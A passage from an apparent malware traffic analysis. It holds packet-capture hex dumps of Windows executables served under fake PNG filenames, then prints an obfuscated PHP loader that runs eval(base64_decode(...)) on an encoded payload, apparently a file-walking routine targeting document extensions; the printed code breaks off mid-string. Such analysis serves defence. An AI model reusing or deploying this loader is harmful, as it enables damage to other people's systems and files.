66 74 2d 49 49 53 2f 37 2e 35 0d 0a 58 2d 50 6f ft-IIS/7.5..X-Po
77 65 72 65 64 2d 42 79 3a 20 50 48 50 2f 35 2e wered-By: PHP/5.
34 2e 31 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 4.14..Content-Di
73 70 6f 73 69 74 69 6f 6e 3a 20 61 74 74 61 63 sposition: attac
68 6d 65 6e 74 3b 20 66 69 6c 65 6e 61 6d 65 3d hment; filename=
62 36 34 38 35 38 30 64 61 65 65 64 36 38 2e 70 b648580daeed68.p
6e 67 0d 0a 58 2d 50 6f 77 65 72 65 64 2d 42 79 ng..X-Powered-By
3a 20 41 53 50 2e 4e 45 54 0d 0a 44 61 74 65 3a : ASP.NET..Date:
20 57 65 64 2c 20 30 36 20 4a 75 6c 20 32 30 31 Wed, 06 Jul 201
36 20 30 30 3a 31 33 3a 34 34 20 47 4d 54 0d 0a 6 00:13:44 GMT..
0d 0a 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff ..MZ............
00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 ..........@.....
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 ................
00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 ..........!..L.!
54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e This program can
6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f not be run in DO
53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 S mode....$.....
00 00 98 b3 ad 85 dc d2 c3 d6 dc d2 c3 d6 dc d2 ................
c3 d6 a7 ce cf d6 db d2 c3 d6 5f ce cd d6 dd d2 .........._.....
c3 d6 5f da 9e d6 da d2 c3 d6 dc d2 c2 d6 71 d2 .._...........q.
c3 d6 34 cd c9 d6 d3 d2 c3 d6 64 d4 c5 d6 dd d2 ..4.......d.....
c3 d6 34 cd c7 d6 da d2 c3 d6 52 69 63 68 dc d2 ..4.......Rich..
c3 d6 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 ..........PE..L.
04 00 39 47 9b 48 00 00 00 00 00 00 00 00 e0 00 ..9G.H..........
0f 01 0b 01 06 00 00 60 00 00 00 60 00 00 00 00 .......`...`....
00 00 70 6a 00 00 00 10 00 00 00 70 00 00 00 00 ..pj.......p....
40 00 00 10 00 00 00 10 00 00 04 00 00 00 04 00 @...............
00 00 04 00 00 00 00 00 00 00 00 d0 00 00 00 10 ................
00 00 00 00 00 00 03 00 00 00 00 00 10 00 00 10 ................
00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 ................
00 00 30 82 00 00 e4 04 00 00 68 74 00 00 78 00 ..0.......ht..x.
00 00 00 c0 00 00 08 04 00 00 00 00 00 00 00 00 ................
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00 00 00 70 00 00 c0 02 00 00 00 00 00 00 00 00 ...p............
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00 00 2e 74 65 78 74 00 00 00 b0 5b 00 00 00 10 ...text....[....
00 00 00 60 00 00 00 10 00 00 00 00 00 00 00 00 ...`............
00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 ...... ..`.rdata
00 00 14 17 00 00 00 70 00 00 00 20 00 00 00 70 .......p... ...p
00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 ..............@.
00 40 2e 64 61 74 61 00 00 00 28 26 00 00 00 90 .@.data...(&....
00 00 00 10 00 00 00 90 00 00 00 00 00 00 00 00 ................
00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 ......@....rsrc.
00 00 08 04 00 00 00 c0 00 00 00 10 00 00 00 a0 ................
00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 ..............@.
00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 .@..............
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00 00 00 00 ...
TCP Flow:[172.16.1.126:49158:6:184.107.174.122:80] pkts:643 matchs with (0x14b3be0)Regex [experimental0]
48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d HTTP/1.1 200 OK.
0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a .Content-Length:
20 31 34 31 37 32 31 36 0d 0a 43 6f 6e 74 65 6e 1417216..Conten
74 2d 54 79 70 65 3a 20 69 6d 61 67 65 2f 70 6e t-Type: image/pn
67 0d 0a 53 65 72 76 65 72 3a 20 4d 69 63 72 6f g..Server: Micro
73 6f 66 74 2d 49 49 53 2f 37 2e 35 0d 0a 58 2d soft-IIS/7.5..X-
50 6f 77 65 72 65 64 2d 42 79 3a 20 50 48 50 2f Powered-By: PHP/
35 2e 34 2e 31 34 0d 0a 43 6f 6e 74 65 6e 74 2d 5.4.14..Content-
44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 61 74 74 Disposition: att
61 63 68 6d 65 6e 74 3b 20 66 69 6c 65 6e 61 6d achment; filenam
65 3d 36 62 37 34 65 2e 70 6e 67 0d 0a 58 2d 50 e=6b74e.png..X-P
6f 77 65 72 65 64 2d 42 79 3a 20 41 53 50 2e 4e owered-By: ASP.N
45 54 0d 0a 44 61 74 65 3a 20 57 65 64 2c 20 30 ET..Date: Wed, 0
36 20 4a 75 6c 20 32 30 31 36 20 30 30 3a 31 33 6 Jul 2016 00:13
3a 34 34 20 47 4d 54 0d 0a 0d 0a 4d 5a 90 00 03 :44 GMT....MZ...
00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 ................
00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 ...@............
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00 00 00 00 00 00 00 f8 00 00 00 0e 1f ba 0e 00 ................
b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 ...!..L.!This pr
6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 ogram cannot be
72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e run in DOS mode.
0d 0d 0a 24 00 00 00 00 00 00 00 ff 90 b5 04 bb ...$............
f1 db 57 bb f1 db 57 bb f1 db 57 c0 ed d7 57 a5 ..W...W...W...W.
f1 db 57 38 ed d5 57 bf f1 db 57 8d d7 d1 57 b0 ..W8..W...W...W.
f1 db 57 3c ed d9 57 94 f1 db 57 35 f9 84 57 be ..W<..W...W5..W.
f1 db 57 38 f9 86 57 b6 f1 db 57 bb f1 da 57 92 ..W8..W...W...W.
f0 db 57 53 ee d1 57 ba f0 db 57 03 f7 dd 57 ba ..WS..W...W...W.
f1 db 57 53 ee df 57 b8 f1 db 57 52 69 63 68 bb ..WS..W...WRich.
f1 db 57 00 00 00 00 00 00 00 00 00 00 00 00 00 ..W.............
00 00 00 50 45 00 00 4c 01 05 00 37 47 9b 48 00 ...PE..L...7G.H.
00 00 00 00 00 00 00 e0 00 0e 21 0b 01 06 00 00 ..........!.....
30 10 00 00 10 06 00 00 00 00 00 15 3e 10 00 00 0...........>...
10 00 00 00 40 10 00 00 00 00 10 00 10 00 00 00 ....@...........
10 00 00 04 00 00 00 04 00 00 00 04 00 00 00 00 ................
00 00 00 00 50 16 00 00 10 00 00 00 00 00 00 02 ....P...........
00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 ................
10 00 00 00 00 00 00 10 00 00 00 40 94 11 00 60 ...........@...`
5f 00 00 48 81 11 00 b4 00 00 00 00 70 15 00 00 _..H........p...
04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00 00 00 00 80 15 00 d8 bd 00 00 00 00 00 00 00 ................
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00 00 00 00 00 00 00 00 00 00 00 00 40 10 00 50 ............@..P
05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 ............text
00 00 00 e6 2e 10 00 00 10 00 00 00 30 10 00 00 ............0...
10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 ...............
00 00 60 2e 72 64 61 74 61 00 00 a0 b3 01 00 00 ..`.rdata.......
40 10 00 00 c0 01 00 00 40 10 00 00 00 00 00 00 @.......@.......
00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 .......@..@.data
00 00 00 e8 6f 03 00 00 00 12 00 00 c0 02 00 00 ....o...........
00 12 00 00 00 00 00 00 00 00 00 00 00 00 00 40 ...............@
00 00 c0 2e 72 73 72 63 00 00 00 00 04 00 00 00 ....rsrc........
70 15 00 00 10 00 00 00 c0 14 00 00 00 00 00 00 p...............
00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f .......@..@.relo
63 00 00 68 c7 00 00 00 80 15 00 00 d0 00 00 00 c..h............
d0 14 00 00 00 00 00 00 00 00 00 00 00 00 00 40 ...............@
00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 ..B.............
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00 00 00 00 ...
TCP Flow:[172.16.1.126:49158:6:184.107.174.122:80] pkts:2585 matchs with (0x14b3be0)Regex [experimental0]
48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d HTTP/1.1 200 OK.
0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a .Content-Length:
20 37 30 39 36 0d 0a 43 6f 6e 74 65 6e 74 2d 54 7096..Content-T
79 70 65 3a 20 69 6d 61 67 65 2f 70 6e 67 0d 0a ype: image/png..
53 65 72 76 65 72 3a 20 4d 69 63 72 6f 73 6f 66 Server: Microsof
74 2d 49 49 53 2f 37 2e 35 0d 0a 58 2d 50 6f 77 t-IIS/7.5..X-Pow
65 72 65 64 2d 42 79 3a 20 50 48 50 2f 35 2e 34 ered-By: PHP/5.4
2e 31 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 .14..Content-Dis
70 6f 73 69 74 69 6f 6e 3a 20 61 74 74 61 63 68 position: attach
6d 65 6e 74 3b 20 66 69 6c 65 6e 61 6d 65 3d 37 ment; filename=7
33 30 32 64 2e 70 6e 67 0d 0a 58 2d 50 6f 77 65 302d.png..X-Powe
72 65 64 2d 42 79 3a 20 41 53 50 2e 4e 45 54 0d red-By: ASP.NET.
0a 44 61 74 65 3a 20 57 65 64 2c 20 30 36 20 4a .Date: Wed, 06 J
75 6c 20 32 30 31 36 20 30 30 3a 31 33 3a 34 38 ul 2016 00:13:48
20 47 4d 54 0d 0a 0d 0a 3c 3f 70 68 70 20 24 6f GMT....<?php $o
34 34 38 3d 22 70 72 65 67 5f 72 22 2e 63 68 72 448="preg_r".chr
28 31 30 31 29 2e 22 70 6c 22 2e 63 68 72 28 39 (101)."pl".chr(9
37 29 2e 63 68 72 28 39 39 29 2e 22 65 22 3b 24 7).chr(99)."e";$
78 34 33 38 3d 22 65 76 22 2e 63 68 72 28 39 37 x438="ev".chr(97
29 2e 63 68 72 28 31 30 38 29 2e 63 68 72 28 34 ).chr(108).chr(4
30 29 2e 22 62 61 73 65 36 34 22 2e 63 68 72 28 0)."base64".chr(
39 35 29 2e 22 64 22 2e 63 68 72 28 31 30 31 29 95)."d".chr(101)
2e 22 63 6f 64 65 28 22 2e 63 68 72 28 33 34 29 ."code(".chr(34)
2e 22 63 32 56 30 58 33 52 70 22 2e 63 68 72 28 ."c2V0X3Rp".chr(
39 38 29 2e 22 57 22 2e 63 68 72 28 38 36 29 2e 98)."W".chr(86).
22 66 62 22 2e 63 68 72 28 37 31 29 2e 22 6c 74 "fb".chr(71)."lt
61 22 2e 63 68 72 28 38 38 29 2e 22 51 6f 4d 22 a".chr(88)."QoM"
2e 63 68 72 28 36 37 29 2e 22 6b 37 44 22 2e 63 .chr(67)."k7D".c
68 72 28 38 31 29 2e 22 6f 4e 43 6d 5a 76 63 22 hr(81)."oNCmZvc"
2e 63 68 72 28 31 30 35 29 2e 63 68 72 28 31 30 .chr(105).chr(10
33 29 2e 22 6b 61 22 2e 63 68 72 28 38 34 29 2e 3)."ka".chr(84).
22 30 22 2e 63 68 72 28 35 30 29 2e 22 4e 7a 73 "0".chr(50)."Nzs
6b 61 54 77 39 4f 54 41 37 4a 47 22 2e 63 68 72 kaTw9OTA7JG".chr
28 31 30 37 29 2e 22 72 22 2e 63 68 72 28 37 35 (107)."r".chr(75
29 2e 22 79 6b 67 61 57 59 22 2e 63 68 72 28 31 )."ykgaWY".chr(1
31 31 29 2e 22 51 22 2e 63 68 72 28 37 31 29 2e 11)."Q".chr(71).
63 68 72 28 31 30 38 29 2e 63 68 72 28 31 32 32 chr(108).chr(122
29 2e 22 58 22 2e 63 68 72 28 35 30 29 2e 22 52 )."X".chr(50)."R
22 2e 63 68 72 28 31 31 32 29 2e 22 63 22 2e 63 ".chr(112)."c".c
68 72 28 31 30 35 29 2e 22 68 6a 61 48 22 2e 63 hr(105)."hjaH".c
68 72 28 37 33 29 2e 22 6f 4a 47 6b 70 4c 69 63 hr(73)."oJGkpLic
36 22 2e 63 68 72 28 37 34 29 2e 22 79 6b 22 2e 6".chr(74)."yk".
63 68 72 28 31 31 32 29 2e 22 49 46 22 2e 63 68 chr(112)."IF".ch
72 28 38 32 29 2e 22 79 5a 57 22 2e 63 68 72 28 r(82)."yZW".chr(
38 35 29 2e 22 6f 59 22 2e 63 68 72 28 35 30 29 85)."oY".chr(50)
2e 22 68 79 4b 43 52 70 4b 53 34 6e 4f 69 22 2e ."hyKCRpKS4nOi".
63 68 72 28 39 39 29 2e 22 70 4f 77 22 2e 63 68 chr(99)."pOw".ch
72 28 34 38 29 2e 22 4b 22 2e 63 68 72 28 36 38 r(48)."K".chr(68
29 2e 22 51 22 2e 63 68 72 28 31 31 32 29 2e 22 )."Q".chr(112)."
6d 22 2e 63 68 72 28 31 30 30 29 2e 22 57 35 6a m".chr(100)."W5j
22 2e 63 68 72 28 31 30 30 29 2e 22 47 6c 76 22 ".chr(100)."Glv"
2e 63 68 72 28 39 38 29 2e 22 69 42 22 2e 63 68 .chr(98)."iB".ch
72 28 38 35 29 2e 22 63 6d 56 6c 4b 43 52 77 4b r(85)."cmVlKCRwK
51 30 4b 65 22 2e 63 68 72 28 31 31 39 29 2e 22 Q0Ke".chr(119)."
30 4b 43 53 52 68 50 22 2e 63 68 72 28 38 33 29 0KCSRhP".chr(83)
2e 22 64 6c 4a 22 2e 63 68 72 28 31 32 32 29 2e ."dlJ".chr(122).
22 73 4e 22 2e 63 68 72 28 36 37 29 2e 22 67 22 "sN".chr(67)."g"
2e 63 68 72 28 31 30 37 29 2e 22 6b 61 7a 31 69 .chr(107)."kaz1i
59 58 4e 6c 4e 6a 22 2e 63 68 72 28 38 32 29 2e YXNlNj".chr(82).
22 66 22 2e 63 68 72 28 39 30 29 2e 22 47 56 6a "f".chr(90)."GVj
22 2e 63 68 72 28 39 38 29 2e 22 32 52 6c 4b 43 ".chr(98)."2RlKC
22 2e 63 68 72 28 31 30 30 29 2e 22 4e 22 2e 63 ".chr(100)."N".c
68 72 28 38 36 29 2e 22 30 74 55 57 6b 70 69 53 hr(86)."0tUWkpiS
58 70 43 51 6c 22 2e 63 68 72 28 38 36 29 2e 22 XpCQl".chr(86)."
75 51 55 35 78 4c 32 22 2e 63 68 72 28 34 39 29 uQU5xL2".chr(49)
2e 22 55 53 32 31 22 2e 63 68 72 28 37 39 29 2e ."US21".chr(79).
22 64 32 22 2e 63 68 72 28 31 30 30 29 2e 22 69 "d2".chr(100)."i
4f 47 64 22 2e 63 68 72 28 31 31 31 29 2e 22 64 OGd".chr(111)."d
31 42 6e 64 7a 68 22 2e 63 68 72 28 37 32 29 2e 1Bndzh".chr(72).
22 52 46 46 56 63 57 59 34 53 22 2e 63 68 72 28 "RFFVcWY4S".chr(
31 30 39 29 2e 22 78 70 53 33 42 42 5a 48 22 2e 109)."xpS3BBZH".
63 68 72 28 37 30 29 2e 22 7a 51 22 2e 63 68 72 chr(70)."zQ".chr
28 34 38 29 2e 22 4e 52 54 6d 39 51 22 2e 63 68 (48)."NRTm9Q".ch
72 28 38 35 29 2e 63 68 72 28 38 33 29 2e 22 74 r(85).chr(83)."t
59 52 47 35 22 2e 63 68 72 28 31 30 36 29 2e 22 YRG5".chr(106)."
54 6d 4d 72 65 22 2e 63 68 72 28 38 35 29 2e 22 TmMre".chr(85)."
4a 43 22 2e 63 68 72 28 38 37 29 2e 22 54 22 2e JC".chr(87)."T".
63 68 72 28 38 36 29 2e 22 46 59 22 2e 63 68 72 chr(86)."FY".chr
28 38 37 29 2e 22 39 75 22 2e 63 68 72 28 38 31 (87)."9u".chr(81
29 2e 63 68 72 28 31 30 37 29 2e 22 4e 46 22 2e ).chr(107)."NF".
63 68 72 28 39 38 29 2e 22 46 42 57 56 30 22 2e chr(98)."FBWV0".
63 68 72 28 31 30 37 29 2e 22 7a 63 6c 4a 79 54 chr(107)."zclJyT
7a 52 33 53 22 2e 63 68 72 28 36 38 29 2e 22 46 zR3S".chr(68)."F
22 2e 63 68 72 28 31 31 32 29 2e 63 68 72 28 38 ".chr(112).chr(8
35 29 2e 63 68 72 28 31 30 38 29 2e 22 6c 4e 55 5).chr(108)."lNU
57 39 45 4d 32 4a 6b 53 30 22 2e 63 68 72 28 31 W9EM2JkS0".chr(1
30 38 29 2e 22 36 64 7a 22 2e 63 68 72 28 39 30 08)."6dz".chr(90
29 2e 22 44 51 6c 6c 4c 53 54 63 77 55 57 4a 5a )."DQllLSTcwUWJZ
22 2e 63 68 72 28 39 39 29 2e 22 6b 22 2e 63 68 ".chr(99)."k".ch
72 28 34 39 29 2e 22 4b 22 2e 63 68 72 28 39 30 r(49)."K".chr(90
29 2e 22 30 45 35 61 30 4e 22 2e 63 68 72 28 37 )."0E5a0N".chr(7
36 29 2e 22 6).
PacketDispatcher(0x131ed10) statistics
Connected to Lan network stack
Total packets: 9130
Total bytes: 6254270
RegexManager(0x14b3b10) statistics
Regex:experimental0 matches:5
Exiting process
So the first 4 downloads shows that in reality they are download EXE files, and the last download is downloading some type of obfuscated php code.
<?php $o448="preg_r".chr(101)."pl".chr(97).chr(99)."e";$x438="ev".chr(97).chr(108).chr(40)."base64".chr(95)."d".chr(101)."code(".chr(34)."c2V0X3Rp".chr(98)."W".chr(86)."fb".chr(71)."lta".chr(88)."QoM".chr(67)."k7D".chr(81)."oNCmZvc".chr(105).chr(103)."ka".chr(84)."0".chr(50)."NzskaTw9OTA7JG".chr(107)."r".chr(75)."ykgaWY".chr(111)."Q".chr(71).chr(108).chr(122)."X".chr(50)."R".chr(112)."c".chr(105)."hjaH".chr(73)."oJGkpLic6".chr(74)."yk".chr(112)."IF".chr(82)."yZW".chr(85)."oY".chr(50)."hyKCRpKS4nOi".chr(99)."pOw".chr(48)."K".chr(68)."Q".chr(112)."m".chr(100)."W5j".chr(100)."Glv".chr(98)."iB".chr(85)."cmVlKCRwKQ0Ke".chr(119)."0KCSRhP".chr(83)."dlJ".chr(122)."sN".chr(67)."g".chr(107)."kaz1iYXNlNj".chr(82)."f".chr(90)."GVj".chr(98)."2RlKC".chr(100)."N".chr(86)."0tUWkpiSXpCQl".chr(86)."uQU5xL2".chr(49)."US21".chr(79)."d2".chr(100)."iOGd".chr(111)."d1Bndzh".chr(72)."RFFVcWY4S".chr(109)."xpS3BBZH".chr(70)."zQ".chr(48)."NRTm9Q".chr(85).chr(83)."tYRG5".chr(106)."TmMre".chr(85)."JC".chr(87)."T".chr(86)."FY".chr(87)."9u".chr(81).chr(107)."NF".chr(98)."FBWV0".chr(107)."zclJyTzR3S".chr(68)."F".chr(112).chr(85).chr(108)."lNUW9EM2JkS0".chr(108)."6dz".chr(90)."DQllLSTcwUWJZ".chr(99)."k".chr(49)."K".chr(90)."0E5a0N".chr(76)."U".chr(85)."pMa3l6YWhMR0".chr(116)."Z".chr(74).chr(121)."k".chr(55)."D".chr(81)."oJ".chr(74)."HM9Y".chr(50)."hy".chr(75)."DkyKTsNC".chr(103)."0KCWlmKHByZ".chr(87)."dfbWF".chr(48)."Y2".chr(103)."oJy8nLiRzLiRzLicod2lub".chr(110)."R8".chr(89)."m9vdHxzeXN0ZW18d".chr(50)."luZG93c3x0bXB8dG".chr(86)."tcHxwcm9ncm".chr(70)."tfGFwcGRhdGF8YX".chr(66)."wbG".chr(108)."jYX".chr(82).chr(112).chr(98)."258".chr(99)."m9hb".chr(87)."luZ".chr(51)."xtc29".chr(109)."Zm".chr(108).chr(106)."ZXx0".chr(90)."W1wb3Jh".chr(99).chr(110)."l8Y2FjaGUpL".chr(50)."knLCRw".chr(75)."S".chr(66)."8fCBwc".chr(109).chr(86)."nX21".chr(104)."dGNoKC".chr(99)."vc".chr(109)."VjeWNsZ".chr(83)."9pJ".chr(121)."wkcCkpIHJ".chr(108)."dH".chr(86)."y".chr(98).chr(106)."sN".chr(67).chr(103)."0".chr(75)."CSRk".chr(99)."D1".chr(65)."b3".chr(66)."lb".chr(109).chr(82)."pcigkcCk7".chr(68)."QoN".chr(67)."glpZi".chr(103)."kZHA".chr(57)."PT1mYWxz".chr(90)."SkgcmV0dXJuOw0KDQo".chr(74).chr(100).chr(50)."hpbGUoJG89QHJl".chr(89)."WRkaX".chr(73)."oJ".chr(71)."Rw".chr(75)."Sk".chr(103)."aWYoJG8hPScuJyYmJ".chr(71)."8".chr(104)."P".chr(83).chr(99)."uLi".chr(99)."pD".chr(81)."oJew0".chr(75)."C".chr(81).chr(108)."p".chr(90).chr(105)."Ao".chr(81)."Glz".chr(88)."2Rp".chr(99)."igkc".chr(67)."4k".chr(99).chr(121)."4k".chr(98)."ykpDQoJC".chr(88)."sN".chr(67)."gk".chr(74)."C".chr(86)."R".chr(121)."Z".chr(87)."U".chr(111)."J".chr(72).chr(65)."u".chr(74)."HM".chr(117)."JG8pOw".chr(48)."K".chr(67)."Q".chr(108)."9DQoJ".chr(67).chr(87)."V".chr(115).chr(99)."2Vp".chr(90)."iAoJGE9PSdlJyYmcHJlZ19tYX".chr(82)."ja".chr(67).chr(103)."nL1".chr(115)."uXS".chr(104)."6aXB8cmFyfHIwMHxy".chr(77)."DF".chr(56)."cjAy".chr(102)."HIwM".chr(51)."w3enx0YXJ8Z3".chr(112)."8Z".chr(51).chr(112).chr(112).chr(99)."H".chr(120)."hcmN8YXJqf".chr(71).chr(74)."6fG".chr(74)."6Mn".chr(120)."i".chr(101)."mF".chr(56)."YnppcHxie".chr(109)."l".chr(119)."MnxpY".chr(50)."V".chr(56).chr(101)."GxzfHh".chr(115)."c3h8Z".chr(71)."9jfGRvY3h".chr(56).chr(99)."GRmfGRqdnV".chr(56).chr(90)."m".chr(73)."yf".chr(72)."J0Znx".chr(119)."cHR8".chr(99)."HB0e".chr(72).chr(120)."w".chr(99)."HN8c3hpf".chr(71)."9kbXx".chr(118)."ZHR8bXBwf".chr(72)."Nza".chr(72).chr(120).chr(119)."d".chr(87)."J8".chr(90)."3Bn".chr(102).chr(72).chr(66).chr(110).chr(99)."HxrZGJ".chr(56)."a2Rie".chr(72)."x".chr(104)."b".chr(72)."N8YXVwfGN".chr(119)."cn".chr(120)."ucH".chr(74)."8Y3BwfGJhc3xhc2".chr(49)."8".chr(89).chr(51).chr(78)."8cGhwfHB".chr(104)."c3xjbG".chr(70)."zc3xweXxwb".chr(72)."xof".chr(72)."ZifHZjcHJvanx2Yn".chr(66).chr(121)."b2".chr(112).chr(56)."amF2YXxiYWt8Ym".chr(70)."ja3V".chr(119).chr(102)."G1kYnxhY2NkYnx".chr(116)."ZGZ8b2".chr(82).chr(105)."fHdkYnxjc".chr(51)."Z8dHN".chr(50)."fHNxb".chr(72)."xwc".chr(50)."R8Z".chr(88).chr(66)."zfGN".chr(107)."cnxjcH".chr(82).chr(56)."a".chr(87).chr(53)."kZHxk".chr(100)."2d8YWl8c3ZnfG1heHxza3B8".chr(99)."2N".chr(104)."ZHxjYWR".chr(56).chr(77).chr(50)."RzfGJ".chr(115).chr(90)."W5kf".chr(71)."x3b3".chr(120)."sd3N8bWJ8c2xk".chr(90)."HJ3".chr(102)."HN".chr(115)."ZGFz".chr(98).chr(88)."x".chr(122)."bGRwc".chr(110)."R".chr(56)."dT".chr(78)."kfGpwZ3xqc".chr(71)."VnfH".chr(82)."pZmZ8".chr(100)."Glm".chr(102)."HJh".chr(100)."3xh".chr(100)."m".chr(108)."8".chr(98)."XBnfG1w".chr(78)."HxtNH".chr(90)."8bXBl".chr(90)."3xtcGV8d21mf".chr(72)."dtdnx".chr(50)."ZWd8".chr(98)."W92fD".chr(78)."ncHxmb".chr(72)."Z".chr(56).chr(98)."Wt2f".chr(72)."ZvYnx".chr(121)."bXxt".chr(99)."DN8d2".chr(70).chr(50)."fG".chr(70).chr(122)."Znx3".chr(98)."WF8b".chr(84)."N1".chr(102)."G1pZGl8b2dn